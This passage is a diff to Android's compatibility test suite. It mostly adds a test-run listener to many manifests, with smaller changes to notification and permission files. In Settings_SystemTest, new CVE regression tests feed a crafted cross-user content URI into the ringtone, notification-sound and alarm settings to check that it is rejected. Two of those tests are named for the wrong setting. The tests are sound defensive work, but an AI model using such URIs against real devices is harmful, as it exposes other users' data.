diff --git a/tests/tests/nativehardware/AndroidManifest.xml b/tests/tests/nativehardware/AndroidManifest.xml
index 0fc8281..866e30a 100644
--- a/tests/tests/nativehardware/AndroidManifest.xml
+++ b/tests/tests/nativehardware/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.hardware.nativehardware.cts"
android:label="CTS native hardware tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/nativemidi/AndroidManifest.xml b/tests/tests/nativemidi/AndroidManifest.xml
index 609fa59..f89d012 100755
--- a/tests/tests/nativemidi/AndroidManifest.xml
+++ b/tests/tests/nativemidi/AndroidManifest.xml
@@ -46,5 +46,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS Native MIDI tests"
android:targetPackage="android.nativemidi.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/ndef/AndroidManifest.xml b/tests/tests/ndef/AndroidManifest.xml
index 0daae75..57320da 100644
--- a/tests/tests/ndef/AndroidManifest.xml
+++ b/tests/tests/ndef/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.ndef.cts"
android:label="CTS tests of NDEF data classes">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml b/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml
index 6c04451..0d8c67a 100644
--- a/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml
+++ b/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.netsecpolicy.usescleartext_false.cts"
android:label="Tests for NetworkSecurityPolicy cleartext traffic policy when it is set to denied.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml b/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml
index 04a589d..1dc9e61 100644
--- a/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml
+++ b/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.netsecpolicy.usescleartext_true.cts"
android:label="Tests for NetworkSecurityPolicy cleartext traffic policy when it is set to permitted.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml b/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml
index 45ef96d..711ddb6 100644
--- a/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml
+++ b/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.netsecpolicy.usescleartext_unspecified.cts"
android:label="Tests for NetworkSecurityPolicy cleartext traffic policy when it is not specified.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml
index 7c58e78..ef8a381 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigAttributeTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml
index cfbaffd..ac81332 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigBasicDomainConfigTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml
index 9590352..f73c143 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigPrePCleartextTrafficTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml
index 53a4e4b..b6dcfd7 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigCleartextTrafficTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml
index 8636edf..b995fb2 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigBasicDebugDisabledTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml
index 96c543d..c8a69f3 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigBasicDebugEnabledTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml
index 05fd57a..715952a 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigDownloadManagerTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml
index 2043ee6..05b08b4 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigInvalidPinTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml
index 6096ed2..9de61b2 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigNestedDomainConfigTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml
index 1b97069..699a1ad 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigResourcesSrcTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/nfc/AndroidManifest.xml b/tests/tests/nfc/AndroidManifest.xml
index b4404ae..ae7fa49 100644
--- a/tests/tests/nfc/AndroidManifest.xml
+++ b/tests/tests/nfc/AndroidManifest.xml
@@ -42,6 +42,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for Nfc CardEmulation API"
android:targetPackage="android.nfc.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java b/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java
index 120186b..81d10e1 100644
--- a/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java
+++ b/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java
@@ -40,6 +40,7 @@
import java.lang.ref.WeakReference;
import java.util.Set;
+import java.util.concurrent.atomic.AtomicInteger;
import java.util.stream.Stream;
/**
@@ -133,20 +134,21 @@
break;
}
case MESSAGE_CLICK_NOTIFICATION: {
- PendingIntent intent = Stream
- .of(mNotificationManager.getActiveNotifications())
+ AtomicInteger counter = new AtomicInteger();
+ Stream.of(mNotificationManager.getActiveNotifications())
.filter(sb -> sb.getId() == notificationId)
- .map(sb -> sb.getNotification().contentIntent)
- .findFirst()
- .orElse(null);
- if (intent != null) {
- try {
- intent.send();
- } catch (PendingIntent.CanceledException e) {
- throw new IllegalStateException("Notification PI cancelled", e);
- }
- }
- sendMessageToTest(mCallback, TEST_MESSAGE_NOTIFICATION_CLICKED, intent != null);
+ .flatMap(sb -> Stream.of(sb.getNotification().contentIntent,
+ sb.getNotification().publicVersion.contentIntent))
+ .forEach(intent -> {
+ try {
+ intent.send();
+ } catch (PendingIntent.CanceledException e) {
+ throw new IllegalStateException("Notification PI cancelled", e);
+ }
+ counter.getAndIncrement();
+ });
+ sendMessageToTest(mCallback, TEST_MESSAGE_NOTIFICATION_CLICKED,
+ counter.get() == 2);
break;
}
default:
@@ -164,10 +166,16 @@
}
private void postNotification(int notificationId, PendingIntent intent) {
+ Notification publicNotification =
+ new Notification.Builder(this, NOTIFICATION_CHANNEL_ID)
+ .setSmallIcon(android.R.drawable.ic_info)
+ .setContentIntent(intent)
+ .build();
Notification notification =
new Notification.Builder(this, NOTIFICATION_CHANNEL_ID)
.setSmallIcon(android.R.drawable.ic_info)
.setContentIntent(intent)
+ .setPublicVersion(publicNotification)
.build();
NotificationChannel notificationChannel = new NotificationChannel(NOTIFICATION_CHANNEL_ID,
NOTIFICATION_CHANNEL_ID, NotificationManager.IMPORTANCE_DEFAULT);
diff --git a/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml
index ab456f4..25566a1 100644
--- a/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml
@@ -36,5 +36,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.notification.legacy20.cts"
android:label="CTS tests for notification behavior (API 20)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml
index 00e7c5f..a670716 100644
--- a/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml
@@ -63,5 +63,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.notification.legacy.cts"
android:label="CTS tests for notification behavior (API 27)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml
index 8b14f55..e369072 100644
--- a/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml
@@ -36,5 +36,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.notification.legacy28.cts"
android:label="CTS tests for notification behavior (API 28)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml
index 5a5eea5..dae1c34 100644
--- a/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml
@@ -48,5 +48,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.notification.legacy29.cts"
android:label="CTS tests for notification behavior (API 29)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml
index 7a1e70f..95fa88c 100644
--- a/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.notification.legacy30.cts"
android:label="CTS tests for notification behavior (API 30)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/opengl/AndroidManifest.xml b/tests/tests/opengl/AndroidManifest.xml
index e99d827..a7a09b7 100644
--- a/tests/tests/opengl/AndroidManifest.xml
+++ b/tests/tests/opengl/AndroidManifest.xml
@@ -23,6 +23,8 @@
<uses-feature android:glEsVersion="0x00020000"/>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.opengl.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<application android:icon="@drawable/ic_launcher"
diff --git a/tests/tests/openglperf/AndroidManifest.xml b/tests/tests/openglperf/AndroidManifest.xml
index f2b681a..8573455 100644
--- a/tests/tests/openglperf/AndroidManifest.xml
+++ b/tests/tests/openglperf/AndroidManifest.xml
@@ -29,9 +29,13 @@
<!-- Two activities are used -->
<instrumentation android:targetPackage="com.replica.replicaisland"
android:name="androidx.test.runner.AndroidJUnitRunner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<instrumentation android:targetPackage="android.openglperf.cts"
android:name="androidx.test.runner.AndroidJUnitRunner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<application>
diff --git a/tests/tests/os/AndroidManifest.xml b/tests/tests/os/AndroidManifest.xml
index bcb9377..01c118a 100644
--- a/tests/tests/os/AndroidManifest.xml
+++ b/tests/tests/os/AndroidManifest.xml
@@ -222,6 +222,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.os.cts"
android:label="CTS tests of android.os">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/os/UffdGc/AndroidManifest.xml b/tests/tests/os/UffdGc/AndroidManifest.xml
index 2438a51..8d7f12e 100644
--- a/tests/tests/os/UffdGc/AndroidManifest.xml
+++ b/tests/tests/os/UffdGc/AndroidManifest.xml
@@ -20,6 +20,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.os.cts.uffdgc"
android:label="CTS tests of userfaultfd-based GC">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/packagewatchdog/AndroidManifest.xml b/tests/tests/packagewatchdog/AndroidManifest.xml
index b985cbd..d4d49d06 100644
--- a/tests/tests/packagewatchdog/AndroidManifest.xml
+++ b/tests/tests/packagewatchdog/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.packagewatchdog.cts"
android:label="CTS tests of PackageWatchdog">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/permission/AndroidManifest.xml b/tests/tests/permission/AndroidManifest.xml
index 43fd97b..bd34215 100644
--- a/tests/tests/permission/AndroidManifest.xml
+++ b/tests/tests/permission/AndroidManifest.xml
@@ -95,6 +95,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.permission.cts"
android:label="CTS tests of android.permission">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/permission/sdk28/AndroidManifest.xml b/tests/tests/permission/sdk28/AndroidManifest.xml
index 1714052..1dfeb2a 100644
--- a/tests/tests/permission/sdk28/AndroidManifest.xml
+++ b/tests/tests/permission/sdk28/AndroidManifest.xml
@@ -47,6 +47,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.permission.cts.sdk28"
android:label="CTS tests of legacy android permissions as of API 28">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/permission/telephony/AndroidManifest.xml b/tests/tests/permission/telephony/AndroidManifest.xml
index 0349880..c2f0943 100644
--- a/tests/tests/permission/telephony/AndroidManifest.xml
+++ b/tests/tests/permission/telephony/AndroidManifest.xml
@@ -31,6 +31,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.permission.cts.telephony"
android:label="CTS tests of android.permission">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/permission3/AndroidManifest.xml b/tests/tests/permission3/AndroidManifest.xml
index 71d1318..0006b9f 100644
--- a/tests/tests/permission3/AndroidManifest.xml
+++ b/tests/tests/permission3/AndroidManifest.xml
@@ -83,5 +83,8 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.permission3.cts"
android:label="CTS UI tests for permissions">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/permissionpolicy/AndroidManifest.xml b/tests/tests/permissionpolicy/AndroidManifest.xml
index 53ddc59..8895c32 100755
--- a/tests/tests/permissionpolicy/AndroidManifest.xml
+++ b/tests/tests/permissionpolicy/AndroidManifest.xml
@@ -68,6 +68,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.permissionpolicy.cts"
android:label="More CTS tests for permissions">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/permissionpolicy/res/raw/android_manifest.xml b/tests/tests/permissionpolicy/res/raw/android_manifest.xml
index 93d2c73..c824ae1 100644
--- a/tests/tests/permissionpolicy/res/raw/android_manifest.xml
+++ b/tests/tests/permissionpolicy/res/raw/android_manifest.xml
@@ -2020,6 +2020,16 @@
<permission android:name="android.permission.MANAGE_TEST_NETWORKS"
android:protectionLevel="signature" />
+ <!-- Allows direct access to {@link android.remoteauth.RemoteAuthManager}.
+ @hide @TestApi @SystemApi(client=android.annotation.SystemApi.Client.MODULE_LIBRARIES) -->
+ <permission android:name="android.permission.MANAGE_REMOTE_AUTH"
+ android:protectionLevel="signature" />
+
+ <!-- Allows direct access to {@link android.remoteauth.RemoteAuthManager}.
+ @hide @TestApi @SystemApi(client=android.annotation.SystemApi.Client.MODULE_LIBRARIES) -->
+ <permission android:name="android.permission.USE_REMOTE_AUTH"
+ android:protectionLevel="signature" />
+
<!-- @SystemApi @hide Allows applications to read Wi-Fi credential.
<p>Not for use by third-party applications. -->
<permission android:name="android.permission.READ_WIFI_CREDENTIAL"
@@ -5510,6 +5520,11 @@
<permission android:name="android.permission.DELIVER_COMPANION_MESSAGES"
android:protectionLevel="normal" />
+ <!-- @SystemApi Allows an application to send and receive messages via CDM transports.
+ @hide -->
+ <permission android:name="android.permission.USE_COMPANION_TRANSPORTS"
+ android:protectionLevel="signature|module" />
+
<!-- Allows an application to create new companion device associations.
@SystemApi
@hide -->
diff --git a/tests/tests/persistentdataservice/AndroidManifest.xml b/tests/tests/persistentdataservice/AndroidManifest.xml
index 30a5344..e5db957 100644
--- a/tests/tests/persistentdataservice/AndroidManifest.xml
+++ b/tests/tests/persistentdataservice/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.persistentdata.cts"
android:label="CTS tests of PersistentDataBlockManager">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<uses-sdk android:minSdkVersion="15" android:targetSdkVersion="17"></uses-sdk>
diff --git a/tests/tests/preference/AndroidManifest.xml b/tests/tests/preference/AndroidManifest.xml
index b04d906..b861458 100644
--- a/tests/tests/preference/AndroidManifest.xml
+++ b/tests/tests/preference/AndroidManifest.xml
@@ -59,6 +59,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.preference.cts"
android:label="CTS tests of android.preference">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/proto/AndroidManifest.xml b/tests/tests/proto/AndroidManifest.xml
index ed2e426..20897cc 100644
--- a/tests/tests/proto/AndroidManifest.xml
+++ b/tests/tests/proto/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.util.proto.cts"
android:label="CTS tests of android.util.proto">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/provider/AndroidManifest.xml b/tests/tests/provider/AndroidManifest.xml
index 9c07941..93ba41d 100644
--- a/tests/tests/provider/AndroidManifest.xml
+++ b/tests/tests/provider/AndroidManifest.xml
@@ -137,5 +137,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.provider.cts"
android:label="CTS tests of android.provider">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
index aed73d9..482cb89 100644
--- a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
+++ b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
@@ -16,6 +16,8 @@
package android.provider.cts.settings;
+import static com.google.common.truth.Truth.assertThat;
+
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertNotNull;
@@ -185,6 +187,50 @@
}
@Test
+ @AsbSecurityTest(cveBugId = 227201030)
+ public void testInvalidRingtoneUriIsRejected() {
+ final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
+ final String originalValue = System.getString(cr, System.RINGTONE);
+ final String invalidUri = "content://10@media/external/audio/media/1000000019";
+ try {
+ System.putString(cr, System.RINGTONE, invalidUri);
+ } catch (Exception ignored) {
+ // Some implementation of SettingsProvider might throw an exception here, which
+ // is okay, as long as the insertion of the invalid setting fails in the end
+ }
+ // Assert that the insertion didn't take effect
+ assertThat(System.getString(cr, System.RINGTONE)).isEqualTo(originalValue);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 227201030)
+ public void testInvalidAlarmAlertUriIsRejected() {
+ final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
+ final String originalValue = System.getString(cr, System.NOTIFICATION_SOUND);
+ final String invalidUri = "content://10@media/external/audio/media/1000000019";
+ try {
+ System.putString(cr, System.NOTIFICATION_SOUND, invalidUri);
+ } catch (Exception ignored) {
+ }
+ // Assert that the insertion didn't take effect
+ assertThat(System.getString(cr, System.NOTIFICATION_SOUND)).isEqualTo(originalValue);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 227201030)
+ public void testInvalidNotificationSoundUriIsRejected() {
+ final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
+ final String originalValue = System.getString(cr, System.ALARM_ALERT);
+ final String invalidUri = "content://10@media/external/audio/media/1000000019";
+ try {
+ System.putString(cr, System.ALARM_ALERT, invalidUri);
+ } catch (Exception ignored) {
+ }
+ // Assert that the insertion didn't take effect
+ assertThat(System.getString(cr, System.ALARM_ALERT)).isEqualTo(originalValue);
+ }
+
+ @Test
public void testGetDefaultValues() {
final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
diff --git a/tests/tests/renderscript/AndroidManifest.xml b/tests/tests/renderscript/AndroidManifest.xml
index 9b4990e..5b04206 100644
--- a/tests/tests/renderscript/AndroidManifest.xml
+++ b/tests/tests/renderscript/AndroidManifest.xml
@@ -32,6 +32,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.renderscript.cts"
android:label="CTS tests of Renderscript component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/renderscriptlegacy/AndroidManifest.xml b/tests/tests/renderscriptlegacy/AndroidManifest.xml
index 5ce5896..cede25e 100644
--- a/tests/tests/renderscriptlegacy/AndroidManifest.xml
+++ b/tests/tests/renderscriptlegacy/AndroidManifest.xml
@@ -30,6 +30,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.renderscriptlegacy.cts"
android:label="CTS tests of Renderscript component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/resolverservice/AndroidManifest.xml b/tests/tests/resolverservice/AndroidManifest.xml
index ab979ab..d52f3db 100644
--- a/tests/tests/resolverservice/AndroidManifest.xml
+++ b/tests/tests/resolverservice/AndroidManifest.xml
@@ -28,5 +28,7 @@
